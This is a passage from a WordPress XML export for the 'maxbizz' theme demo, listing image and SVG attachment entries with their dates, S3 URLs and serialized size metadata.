		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/header-4/04_black/</link>
		<pubDate>Thu, 03 Sep 2020 10:33:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>383</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:33:41]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:33:41]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>217</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/04_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>05_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/header-5/05_black/</link>
		<pubDate>Thu, 03 Sep 2020 10:43:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/05_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>389</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:43:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:43:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[05_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>267</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/05_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/05_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>01_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_footer_builders/footer-1/01_white/</link>
		<pubDate>Fri, 04 Sep 2020 03:40:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>404</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 03:40:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 03:40:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01_white]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>300</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/01_White.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>post</title>
		<link>http://wpdemo.archiwp.com/maxbizz/entering-the-next-phase-of-digital-transformation/post/</link>
		<pubDate>Fri, 04 Sep 2020 07:21:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/post.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>417</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 07:21:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 07:21:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[post]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>413</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/post.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/post.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:350;s:4:"file";s:16:"2020/09/post.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:16:"post-300x121.jpg";s:5:"width";i:300;s:6:"height";i:121;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:16:"post-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:16:"post-768x309.jpg";s:5:"width";i:768;s:6:"height";i:309;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:16:"post-600x350.jpg";s:5:"width";i:600;s:6:"height";i:350;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:16:"post-600x350.jpg";s:5:"width";i:600;s:6:"height";i:350;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg-video</title>
		<link>http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/bg-video/</link>
		<pubDate>Fri, 04 Sep 2020 09:00:07 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg-video.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>432</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:00:07]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:00:07]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg-video]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>430</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg-video.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg-video.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:20:"2020/09/bg-video.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:20:"bg-video-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:20:"bg-video-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"bg-video-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:20:"bg-video-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:20:"bg-video-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>gallery-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/how-to-write-a-successful-grant-application/gallery-1/</link>
		<pubDate>Fri, 04 Sep 2020 09:04:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/gallery-1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>438</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:04:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:04:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[gallery-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>436</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/gallery-1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/gallery-1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:21:"2020/09/gallery-1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"gallery-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"gallery-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"gallery-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"gallery-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"gallery-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>gallery-2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/how-to-write-a-successful-grant-application/gallery-2/</link>
		<pubDate>Fri, 04 Sep 2020 09:04:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/gallery-2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>439</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:04:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:04:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[gallery-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>436</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/gallery-2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/gallery-2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:21:"2020/09/gallery-2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"gallery-2-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"gallery-2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"gallery-2-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"gallery-2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"gallery-2-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>gallery-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz/how-to-write-a-successful-grant-application/gallery-3/</link>
		<pubDate>Fri, 04 Sep 2020 09:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/gallery-3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>440</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[gallery-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>436</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/gallery-3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/gallery-3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:21:"2020/09/gallery-3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"gallery-3-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"gallery-3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"gallery-3-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"gallery-3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"gallery-3-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>blog-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/contactless-payments-time-has-come/blog-1/</link>
		<pubDate>Fri, 04 Sep 2020 09:09:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/blog-1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>448</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:09:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:09:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>447</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/blog-1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/blog-1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:18:"2020/09/blog-1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:18:"blog-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:18:"blog-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"blog-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:18:"blog-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:18:"blog-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>author-widget</title>
		<link>http://wpdemo.archiwp.com/maxbizz/author-widget/</link>
		<pubDate>Fri, 04 Sep 2020 09:10:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/author-widget.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>451</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:10:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:10:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[author-widget]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/author-widget.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/author-widget.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:150;s:6:"height";i:150;s:4:"file";s:25:"2020/09/author-widget.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>banner-widget</title>
		<link>http://wpdemo.archiwp.com/maxbizz/banner-widget/</link>
		<pubDate>Fri, 04 Sep 2020 09:16:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/banner-widget.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>452</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:16:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:16:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[banner-widget]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/banner-widget.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/banner-widget.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:715;s:6:"height";i:794;s:4:"file";s:25:"2020/09/banner-widget.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:25:"banner-widget-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"banner-widget-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"banner-widget-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"banner-widget-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-contacts</title>
		<link>http://wpdemo.archiwp.com/maxbizz/contacts/pheader-contacts/</link>
		<pubDate>Fri, 04 Sep 2020 09:27:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-contacts.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>457</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:27:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:27:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-contacts]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>455</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-contacts.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-contacts.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
